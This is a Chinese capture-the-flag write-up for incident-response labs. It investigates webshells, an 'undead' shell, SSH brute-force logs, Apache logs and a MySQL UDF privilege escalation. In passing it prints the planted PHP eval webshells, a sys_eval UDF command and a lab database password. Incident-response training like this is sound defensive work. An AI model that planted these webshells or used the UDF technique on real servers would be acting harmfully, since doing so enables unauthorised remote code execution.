玄机应急响应WriteUp
第一章 应急响应- Linux入侵排查
web目录存在木马,请找到木马的密码提交
打包
/var/www/html
目录下的文件:tar -cvf archieve.tar .
D盾扫描得到木马路径:
\archive\www\html\1.php
1
eval($_POST[1]);
flag:flag{1}
服务器疑似存在不死马,请找到不死马的密码提交
查看D盾结果中已知后门:
\archive\www\html\index.php
,每隔usleep(3000);
生成一次.shell.php
1
if(md5($_POST["pass"])=="5d41402abc4b2a76b9719d911017c592"){@eval($_POST[cmd]);}
md5解密得flag:flag{hello}
不死马是通过哪个文件生成的,请提交文件名
由 2问 得:flag{index.php}
黑客留下了木马文件,请找出黑客的服务器ip提交
同路径下
shell(1).elf
较为可疑,运行之后看网络连接netstat -antlp
,得到外部连接中黑客的服务器ip:10.11.55.21
1
tcp 0 1 10.0.10.1:33688 10.11.55.21:3333 SYN_SENT 943/./shell(1).elf
故flag:flag{10.11.55.21}
黑客留下了木马文件,请找出黑客服务器开启的监端口提交
同 4问 得:flag{3333}
第一章 应急响应-webshell查杀
黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
打包
/var/www
路径下全部文件1
tar -cvf shell.tar -C /var/www .
用D盾对解压后的文件进行扫描,
在后门文件
/www/html/include/gz.php
得到027ccd04-5065-48b6-a32d-77c704a5e26d
故flag为:flag{027ccd04-5065-48b6-a32d-77c704a5e26d}
黑客使用的什么工具的shell github地址的md5 flag{md5}
截取
gz.php
中间任意一段代码,在github对代码段搜索可知webshell为godzilla1
2echo -n "https://github.com/BeichenDream/Godzilla" | md5sum
39392de3218c333f794befef07ac9257 -故flag为:flag{39392de3218c333f794befef07ac9257}
黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
D盾扫描得到隐藏shell完整路径:
/www/html/include/Db/.Mysqli.php
1
2echo -n "/var/www/html/include/Db/.Mysqli.php" | md5sum
aebac0e58cd6c5fad1695ee4d1ac1919 -故flag为:flag{aebac0e58cd6c5fad1695ee4d1ac1919}
黑客免杀马完整路径 md5 flag{md5}
1
2echo -n "/var/www/html/wap/top.php" | md5sum
eeff2eabfd9b7a6d26fc1a53d3f7d1de -故flag为:flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}
第一章 应急响应-Linux日志分析
有多少IP在爆破主机ssh的root帐号,如果有多个使用","分割 小到大排序 例如flag{192.168.200.1,192.168.200.2}
linux登录日志一般在
/var/log/auth.log
1
2cd /var/log
cat auth.log.1 | grep -a "Failed password for root" | awk '{print $11}' | uniq | sort故flag为:flag{192.168.200.2,192.168.200.31,192.168.200.32}
ssh爆破成功登陆的IP是多少,如果有多个使用","分割
1
cat auth.log.1 | grep -a "Accepted" | awk '{print $11}' | uniq
故flag为:flag{192.168.200.2}
爆破用户名字典是什么?如果有多个使用","分割
1
cat auth.log.1 | grep -a "Failed password" |perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr
故flag为:flag{user,hello,root,test3,test2,test1}
成功登录 root 用户的 ip 一共爆破了多少次
1
cat auth.log.1 | grep -a "Failed password for root" | awk '{print $11}' | sort -n | uniq -c
故flag为:flag{4}
黑客登陆主机后新建了一个后门用户,用户名是多少
在auth.log.1找到new user用户名:test2
故flag为:flag{test2}
第二章 日志分析-apache日志分析
提交当天访问次数最多的IP,即黑客IP:
Ubuntu 系统 apache 默认日志路径在
/var/log/apache2/
1
2
3
4
5
6
7cat /var/log/apache2/access.log.1 | awk '{print $1}' | sort -rn | uniq -c | sort -r
6555 192.168.200.2
29 ::1
5 192.168.200.38
1 192.168.200.48
1 192.168.200.211
1故flag为:flag{192.168.200.2}
黑客使用的浏览器指纹是什么,提交指纹的md5:
1
cat /var/log/apache2/access.log.1 | grep "192.168.200.2"
浏览器指纹为:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
1
echo -n "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36" | md5sum
故flag为:flag{2d6330f380f44ac20f3a02eed0958f66}
查看index.php页面被访问的次数,提交次数:
1
grep "/index.php" /var/log/apache2/access.log.1 | wc -l
故flag为:flag{27}
查看黑客IP访问了多少次,提交次数:
1
2
3
4
5
6
7cat /var/log/apache2/access.log.1 | awk '{print $1}' | sort -rn | uniq -c | sort -r
6555 192.168.200.2
29 ::1
5 192.168.200.38
1 192.168.200.48
1 192.168.200.211
1故flag为:flag{6555}
查看2023年8月03日8时这一个小时内有多少IP访问,提交次数:
1
2
3
4
5
6cat /var/log/apache2/access.log.1 | grep "03/Aug/2023:08" | awk '{print $1}' | sort -nr| uniq -c
1 192.168.200.48
5 192.168.200.38
1 192.168.200.211
6555 192.168.200.2
29 ::1故flag为:flag{5}
第二章日志分析-mysql应急响应
1 | mysql应急响应 ssh账号 root 密码 xjmysql |
黑客第一次写入的shell flag{关键字符串}
打包目录
/var/www/html
,D盾扫描,后门文件\sh.php
flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}
黑客反弹shell的ip flag{ip}
通过
ps -aux
查询到可疑用户1
mysql 364 0.0 1.6 619980 64156 ? Sl 04:51 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
该用户执行command的log日志被记录于
/var/log/mysql/error.log
,查看日志,发现有一个可疑的脚本1.sh
执行
find / -name 1.sh
,得到反弹shell的ipflag{192.168.100.13}
黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx
在路径
/usr/lib/mysql/plugin/
发现udf提权文件flag{b1818bde4e310f3d23f1005185b973e7}
黑客获取的权限 flag{whoami后的值}
在文件
/var/www/html/common.php
中得到mysql数据库账号密码登入数据库
mysql -u root -p334cc35b3c704593
1
2SELECT * FROM mysql.func;
select sys_eval('whoami');flag{mysql}